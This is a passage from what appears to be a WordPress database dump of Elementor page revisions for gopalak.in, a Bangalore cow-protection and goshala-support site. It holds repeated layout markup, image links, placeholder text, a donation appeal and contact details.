/></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-14 10:22:17','2022-10-14 04:52:17','',1373,'https://gopalak.in/?p=1743',0,'revision','',0),(1744,1,'2022-10-14 10:22:17','2022-10-14 04:52:17','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-14 10:22:17','2022-10-14 04:52:17','',1373,'https://gopalak.in/?p=1744',0,'revision','',0),(1745,1,'2022-10-14 10:22:17','2022-10-14 04:52:17','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-14 10:22:17','2022-10-14 04:52:17','',1373,'https://gopalak.in/?p=1745',0,'revision','',0),(1747,1,'2022-10-14 10:28:01','2022-10-14 04:58:01','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n			<a href=\"#\" role=\"button\">\n						Donate\n					</a>\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>','Adopt/Donate','','inherit','closed','closed','','1626-revision-v1','','','2022-10-14 10:28:01','2022-10-14 04:58:01','',1626,'https://gopalak.in/?p=1747',0,'revision','',0),(1748,1,'2022-10-14 10:28:46','2022-10-14 04:58:46','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" 